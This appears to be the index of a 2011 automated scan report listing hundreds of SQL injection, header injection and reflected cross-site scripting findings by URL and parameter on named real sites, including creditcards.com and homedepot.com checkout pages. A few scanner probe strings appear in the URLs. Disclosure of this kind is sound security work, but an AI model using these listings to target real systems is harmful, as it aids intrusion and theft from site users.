XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06172011-01

Report generated by XSS.CX at Fri Jun 17 06:40:33 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 [name of an arbitrarily supplied request parameter]

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s92218100172467 [REST URL parameter 3]

1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 [REST URL parameter 1]

1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95104773896746 [REST URL parameter 2]

1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95972011631820 [REST URL parameter 1]

1.6. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s9749755890574 [REST URL parameter 2]

1.7. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s99864659090526 [REST URL parameter 1]

1.8. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022 [REST URL parameter 1]

1.9. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958 [REST URL parameter 2]

1.10. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 [REST URL parameter 4]

1.11. http://r.turn.com/r/beacon [name of an arbitrarily supplied request parameter]

1.12. http://r.turn.com/r/beacon [rds cookie]

1.13. http://r.turn.com/r/beacon [rrs cookie]

1.14. http://script.footprintlive.com/ [site parameter]

1.15. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]

1.16. http://tap.rubiconproject.com/oz/sensor [User-Agent HTTP header]

1.17. http://tap.rubiconproject.com/oz/sensor [cd cookie]

1.18. http://tap.rubiconproject.com/oz/sensor [cd parameter]

1.19. http://tap.rubiconproject.com/oz/sensor [csi2 cookie]

1.20. http://tap.rubiconproject.com/oz/sensor [dq cookie]

1.21. http://tap.rubiconproject.com/oz/sensor [k parameter]

1.22. http://tap.rubiconproject.com/oz/sensor [khaos cookie]

1.23. http://tap.rubiconproject.com/oz/sensor [lm cookie]

1.24. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.25. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie]

1.26. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.27. http://tap.rubiconproject.com/oz/sensor [put_1512 cookie]

1.28. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

1.29. http://tap.rubiconproject.com/oz/sensor [put_2054 cookie]

1.30. http://tap.rubiconproject.com/oz/sensor [put_2101 cookie]

1.31. http://tap.rubiconproject.com/oz/sensor [rdk cookie]

1.32. http://tap.rubiconproject.com/oz/sensor [rdk15 cookie]

1.33. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

1.34. http://tap.rubiconproject.com/oz/sensor [ses15 cookie]

1.35. http://tap.rubiconproject.com/oz/sensor [ses2 cookie]

1.36. http://tap.rubiconproject.com/oz/sensor [xt parameter]

1.37. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11473368444548 [REST URL parameter 4]

1.38. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11999640008134 [REST URL parameter 6]

1.39. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12511742944840 [REST URL parameter 3]

1.40. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12586278942128 [REST URL parameter 1]

1.41. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12715079787576 [REST URL parameter 2]

1.42. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s13481482698842 [REST URL parameter 4]

1.43. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1405035742937 [REST URL parameter 1]

1.44. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14229447680702 [REST URL parameter 6]

1.45. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14671218963339 [REST URL parameter 3]

1.46. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14691738680163 [REST URL parameter 2]

1.47. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15323097258507 [REST URL parameter 4]

1.48. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15357372987793 [REST URL parameter 3]

1.49. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15506593697366 [REST URL parameter 1]

1.50. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15620280432453 [REST URL parameter 1]

1.51. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 1]

1.52. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 6]

1.53. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16203244941575 [REST URL parameter 5]

1.54. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16457054631772 [REST URL parameter 5]

1.55. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s19969816370798 [REST URL parameter 4]

1.56. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s23837734712508 [REST URL parameter 5]

1.57. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s24903706079207 [REST URL parameter 6]

1.58. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s26866058967834 [REST URL parameter 6]

1.59. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s28965976873370 [REST URL parameter 6]

1.60. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s29808383558389 [REST URL parameter 1]

1.61. http://www.creditcards.com/oc/ [pid parameter]

1.62. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

1.63. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

1.64. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

1.65. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [Coradiantuserid cookie]

1.66. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [RES_TRACKINGID cookie]

1.67. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [THD_SESSION cookie]

1.68. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [URL parameter]

1.69. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [check parameter]

1.70. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [jspStoreDir parameter]

1.71. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [langId parameter]

1.72. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [s_vi cookie]

1.73. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay [catalogId parameter]

1.74. http://www.nutter.com/attorneys.php [AttorneyID parameter]

1.75. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1]

2.15. http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter]

2.16. http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter]

2.17. http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter]

2.18. http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter]

2.19. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]

2.20. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]

2.21. http://c7.zedo.com/img/bh.gif [a parameter]

2.22. http://matcher.bidder7.mookie1.com/google [cver parameter]

2.23. http://tacoda.at.atwola.com/rtx/r.gif [N cookie]

2.24. http://tacoda.at.atwola.com/rtx/r.gif [si parameter]

2.25. http://www.wunderground.com/dotset.php [id parameter]

2.26. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

3.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

3.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

3.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

3.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

3.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

3.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

3.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

3.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

3.10. http://a.rfihub.com/sed [pa parameter]

3.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [name of an arbitrarily supplied request parameter]

3.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [sz parameter]

3.13. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [name of an arbitrarily supplied request parameter]

3.14. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [sz parameter]

3.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [site parameter]

3.16. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [site parameter]

3.17. http://ad.doubleclick.net/adj/nbcu.cnbc/search [site parameter]

3.18. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.19. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.20. http://adnxs.revsci.net/imp [Z parameter]

3.21. http://adnxs.revsci.net/imp [s parameter]

3.22. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.23. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.24. http://ads.pointroll.com/PortalServe/ [dom parameter]

3.25. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.26. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.27. http://ads.pointroll.com/PortalServe/ [time parameter]

3.28. http://adsfac.us/ag.asp [cc parameter]

3.29. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.30. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.31. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.32. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.33. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

3.34. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

3.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.43. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 2]

3.44. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 3]

3.45. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 4]

3.46. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 5]

3.47. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 6]

3.48. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 7]

3.49. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

3.50. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

3.51. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

3.52. http://click.linksynergy.com/fs-bin/click [offerid parameter]

3.53. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 2]

3.54. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 3]

3.55. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 4]

3.56. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 5]

3.57. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [dom parameter]

3.58. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [flash parameter]

3.59. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [name of an arbitrarily supplied request parameter]

3.60. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pid parameter]

3.61. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pos parameter]

3.62. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [r parameter]

3.63. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [redir parameter]

3.64. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [time parameter]

3.65. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 2]

3.66. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 3]

3.67. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 4]

3.68. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 5]

3.69. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [dom parameter]

3.70. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [flash parameter]

3.71. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [name of an arbitrarily supplied request parameter]

3.72. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pid parameter]

3.73. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pos parameter]

3.74. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [r parameter]

3.75. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [redir parameter]

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [time parameter]

3.77. http://ib.adnxs.com/ptj [redir parameter]

3.78. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]

3.79. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]

3.80. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]

3.81. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]

3.82. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [placementid parameter]

3.83. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpck parameter]

3.84. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpt parameter]

3.85. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpvc parameter]

3.86. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpck parameter]

3.87. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpt parameter]

3.88. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpvc parameter]

3.89. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpck parameter]

3.90. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpt parameter]

3.91. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpvc parameter]

3.92. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpck parameter]

3.93. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpt parameter]

3.94. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpvc parameter]

3.95. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpck parameter]

3.96. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpt parameter]

3.97. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpvc parameter]

3.98. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpck parameter]

3.99. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpt parameter]

3.100. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpvc parameter]

3.101. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpck parameter]

3.102. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpt parameter]

3.103. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpvc parameter]

3.104. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]

3.105. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]

3.106. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]

3.107. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]

3.108. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]

3.109. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]

3.110. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpck parameter]

3.111. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpt parameter]

3.112. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpvc parameter]

3.113. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpck parameter]

3.114. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpt parameter]

3.115. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpvc parameter]

3.116. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpck parameter]

3.117. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpvc parameter]

3.118. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpck parameter]

3.119. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpvc parameter]

3.120. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]

3.121. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]

3.122. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]

3.123. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]

3.124. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]

3.125. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]

3.126. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]

3.127. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]

3.128. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]

3.129. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]

3.130. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]

3.131. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]

3.132. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpck parameter]

3.133. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpvc parameter]

3.134. http://js.revsci.net/gateway/gw.js [csid parameter]

3.135. http://oc.creditcards.com/trans_node.php [c parameter]

3.136. http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter]

3.137. http://pixel.adsafeprotected.com/jspix [advId parameter]

3.138. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.139. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.140. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.141. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.142. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.143. http://r.turn.com/server/pixel.htm [fpid parameter]

3.144. http://r.turn.com/server/pixel.htm [sp parameter]

3.145. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

3.146. http://search.cnbc.com/main.do [keywords parameter]

3.147. http://search.cnbc.com/main.do [keywords parameter]

3.148. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.149. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.150. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

3.151. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

3.152. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

3.153. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

3.154. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

3.155. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

3.156. http://www.creditcards.com/0-apr-credit-cards.php [name of an arbitrarily supplied request parameter]

3.157. http://www.creditcards.com/instant-approval.php [name of an arbitrarily supplied request parameter]

3.158. http://www.creditcards.com/oc/ ['"--> parameter]

3.159. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter]

3.160. http://www.creditcards.com/oc/ [nsextt parameter]

3.161. http://www.creditcards.com/oc/ [nsextt parameter]

3.162. http://www.creditcards.com/oc/ [pg parameter]

3.163. http://www.creditcards.com/oc/ [pg parameter]

3.164. http://www.creditcards.com/oc/ [pgpos parameter]

3.165. http://www.creditcards.com/oc/ [pgpos parameter]

3.166. http://www.creditcards.com/oc/ [pid parameter]

3.167. http://www.creditcards.com/oc/ [pid parameter]

3.168. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

3.169. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

3.170. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

3.171. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

3.172. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

3.173. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

3.174. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation [rpp parameter]

3.175. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.176. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.177. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.178. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.179. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [omni parameter]

3.180. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [Overlay_Type parameter]

3.181. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [basePage parameter]

3.182. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [storeSkuNum parameter]

3.183. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService [catEntryId_1 parameter]

3.184. http://www.nutter.com/attorneys.php [AttorneyID parameter]

3.185. http://www.nutter.com/attorneys.php [AttorneyID parameter]

3.186. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]

3.187. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]

3.188. http://www.res-x.com/ws/r2/Resonance.aspx [clk parameter]

3.189. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]

3.190. http://adnxs.revsci.net/imp [Referer HTTP header]

3.191. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.192. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [Referer HTTP header]

3.193. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [Referer HTTP header]

3.194. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.195. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

3.196. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

3.197. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

3.198. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.199. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

3.200. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

3.201. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]

3.202. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

3.203. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

3.204. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

3.205. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.206. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.207. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

3.208. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

3.209. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

3.210. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

3.211. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]

3.212. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

3.213. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

3.214. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.215. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.216. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]

3.217. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]

3.218. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]

3.219. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]

3.220. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

4. Flash cross-domain policy

4.1. http://a.rfihub.com/crossdomain.xml

4.2. http://a.tribalfusion.com/crossdomain.xml

